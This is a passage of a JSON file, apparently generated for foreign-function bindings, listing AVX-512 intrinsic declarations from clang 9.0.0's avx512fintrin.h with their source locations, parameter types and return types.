"name": "_mm512_maskz_scalef_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6490:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm_scalef_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6507:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_scalef_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6516:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_scalef_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_scalef_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6554:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_scalef_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6563:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_scalef_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6579:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm512_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6596:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6602:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6610:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6617:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6623:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_srai_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6631:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_mask_sqrt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_sqrt_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6745:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_sqrt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6767:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_sqrt_ss", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6783:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm512_broadcast_f32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6799:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_mask_broadcast_f32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6807:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_f32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6815:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_broadcast_f64x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6823:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_broadcast_f64x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6830:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_f64x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6838:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_broadcast_i32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6846:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcast_i32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6854:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_i32x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6862:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_broadcast_i64x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6870:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcast_i64x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6877:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_broadcast_i64x4", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6885:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6893:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512d" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_maskz_broadcastsd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6901:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m512d" } }, { "tag": "function", "name": "_mm512_mask_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6909:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m512" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_maskz_broadcastss_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6917:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m512" } }, { "tag": "function", "name": "_mm512_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6925:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6933:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtsepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6940:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6948:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6954:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6962:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtsepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6969:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6977:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6983:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6991:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtsepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:6998:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7006:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7012:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7020:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtsepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7027:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7035:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7041:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7049:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtsepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7056:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtsepi64_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7064:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7070:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7078:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtusepi32_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7086:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi32_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7094:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtusepi32_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi32_storeu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7130:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7138:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtusepi64_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7146:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi64_storeu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7154:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_maskz_cvtusepi64_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7175:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi64_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7183:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm512_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7189:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7197:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__O", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_maskz_cvtusepi64_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:7204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__M", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm512_mask_cvtusepi64_storeu_epi16", "ns": 0, "location": 